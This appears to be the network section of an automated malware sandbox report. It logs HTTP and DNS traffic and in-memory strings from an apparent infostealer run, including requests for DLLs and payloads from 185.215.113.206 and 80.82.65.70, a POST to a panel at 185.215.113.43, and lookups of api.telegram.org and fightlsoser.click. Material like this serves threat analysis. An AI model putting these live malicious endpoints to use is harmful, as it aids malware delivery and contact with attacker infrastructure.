                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://pixel.advertising.com/firefox-etp*://pubads.g.doubleclick.net/gampad/*ad-blk**://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etp*://*.adsafeprotected.com/*/unit/*extensions.webextensions.warnings-as-errors equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002C.00000002.2679783197.00000144AEAE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Failed to listen. Callback argument missing.releaseDistinctSystemPrincipalLoaderFailed to execute WebChannel callback:DevTools telemetry entry point failed: ^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?Got invalid request to save JSON dataJSON Viewer's onSave failed in startPersistenceFailed to listen. Listener already attached.@mozilla.org/network/protocol;1?name=filedevtools/client/framework/devtools@mozilla.org/uriloader/handler-service;1devtools.debugger.remote-websocket{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}browser.fixup.domainsuffixwhitelist.get FIXUP_FLAGS_MAKE_ALTERNATE_URI^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$@mozilla.org/network/protocol;1?name=defaultdevtools.performance.recording.ui-base-urlresource://devtools/server/devtools-server.jsNo callback set for this channel.devtools.performance.popup.feature-flagUnable to start devtools server on devtools/client/framework/devtools-browserWebChannel/this._originCheckCallbackbrowser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNames^([a-z+.-]+:\/{0,3})*([^\/@]+@).+DevToolsStartup.jsm:handleDebuggerFlagresource://devtools/shared/security/socket.jsget FIXUP_FLAG_ALLOW_KEYWORD_LOOKUP@mozilla.org/dom/slow-script-debug;1isDownloadsImprovementsAlreadyMigratedhttps://mail.inbox.lv/compose?to=%sresource://gre/modules/FileUtils.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}extractScheme/fixupChangedProtocol<http://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttp://www.inbox.lv/rfc2368/?value=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/local-handler-app;1resource://gre/modules/FileUtils.sys.mjs@mozilla.org/uriloader/web-handler-app;1gecko.handlerService.defaultHandlersVersionhandlerSvc fillHandlerInfo: don't know this typeresource://gre/modules/DeferredTask.sys.mjshttps://mail.yahoo.co.jp/compose/?To=%s@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/NetUtil.sys.mjs@mozilla.org/network/file-input-stream;1_finalizeInternal/this._finalizePromise<_injectDefaultProtocolHandlersIfNeededhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjsCan't invoke URIFixup in the content process{33d75835-722f-42c0-89cc-44f328e56a86}resource://gre/modules/JSONFile.sys.mjsget FIXUP_FLAG_FORCE_ALTERNATE_URIScheme should be either http or httpsnewChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLNon-zero amount of bytes must be specifiedMust have a source and a callback@mozilla.org/scriptableinputstream;1https://mail.yahoo.co.jp/compose/?To=%shttps://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%sFirst argument should be an nsIInputStreamhttps://poczta.interia.pl/mh/?mailto=%spdfjs.previousHandler.p
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: findUpdates() - updateTask succeeded for KEY_PLUGIN_LAST_INSTALL_FAIL_REASON@mozilla.org/spellchecker/engine;1startup - adding gmp directory failed with *://pub.doubleverify.com/signals/pub.js*resource://gre/modules/addons/XPIProvider.jsm*://static.chartbeat.com/js/chartbeat_video.js*://static.criteo.net/js/ld/publishertag.js@mozilla.org/network/atomic-file-output-stream;1FileUtils_openSafeFileOutputStream*://libs.coremetrics.com/eluminate.js*://auth.9c9media.ca/auth/main.js*://www.rva311.com/static/js/main.*.chunk.js*://c.amazon-adsystem.com/aax2/apstag.js*://connect.facebook.net/*/sdk.js**://connect.facebook.net/*/all.js**://static.chartbeat.com/js/chartbeat.jsFileUtils_openAtomicFileOutputStreamhttps://smartblock.firefox.etp/facebook.svgresource://gre/modules/FileUtils.sys.mjsFileUtils_closeAtomicFileOutputStreamhttps://smartblock.firefox.etp/play.svg*://*.imgur.com/js/vendor.*.bundle.jsFileUtils_closeSafeFileOutputStreampictureinpicture%40mozilla.org:1.0.0webcompat-reporter@mozilla.org.xpi*://www.everestjs.net/static/st.v3.js*webcompat-reporter%40mozilla.org:1.5.1*://*.imgur.io/js/vendor.*.bundle.js*://track.adform.net/serving/scripts/trackpoint/@mozilla.org/addons/addon-manager-startup;1*://web-assets.toggl.com/app/assets/scripts/*.js@mozilla.org/network/file-output-stream;1resource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002C.00000002.2679783197.00000144AEAE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002C.00000002.2682991190.00000144AED30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                      Source: global trafficDNS traffic detected: DNS query: drive.google.com
                      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                      Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: youtube.com
                      Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
                      Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                      Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: global trafficDNS traffic detected: DNS query: support.mozilla.org
                      Source: global trafficDNS traffic detected: DNS query: fightlsoser.click
                      Source: global trafficDNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: www.youtube.com
                      Source: global trafficDNS traffic detected: DNS query: www.facebook.com
                      Source: global trafficDNS traffic detected: DNS query: youtube-ui.l.google.com
                      Source: global trafficDNS traffic detected: DNS query: star-mini.c10r.facebook.com
                      Source: global trafficDNS traffic detected: DNS query: www.wikipedia.org
                      Source: global trafficDNS traffic detected: DNS query: www.reddit.com
                      Source: global trafficDNS traffic detected: DNS query: twitter.com
                      Source: global trafficDNS traffic detected: DNS query: reddit.map.fastly.net
                      Source: global trafficDNS traffic detected: DNS query: dyna.wikimedia.org
                      Source: global trafficDNS traffic detected: DNS query: services.addons.mozilla.org
                      Source: global trafficDNS traffic detected: DNS query: normandy.cdn.mozilla.net
                      Source: global trafficDNS traffic detected: DNS query: normandy-cdn.services.mozilla.com
                      Source: unknownHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/dll/download
                      Source: be08f59021.exe, 00000016.00000003.2862278551.0000000005AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download
                      Source: be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download.V.m
                      Source: be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadWl
                      Source: be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadvY
                      Source: be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadzV
                      Source: be08f59021.exe, 00000016.00000003.3058506798.0000000005AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/download
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: explorer.exe, 00000014.00000000.2216466843.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2216466843.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/DeferredTask.sys.mjs
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/DeferredTask.sys.mjsresource:
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401331620.00000234A0E30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401331620.00000234A0E30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micj
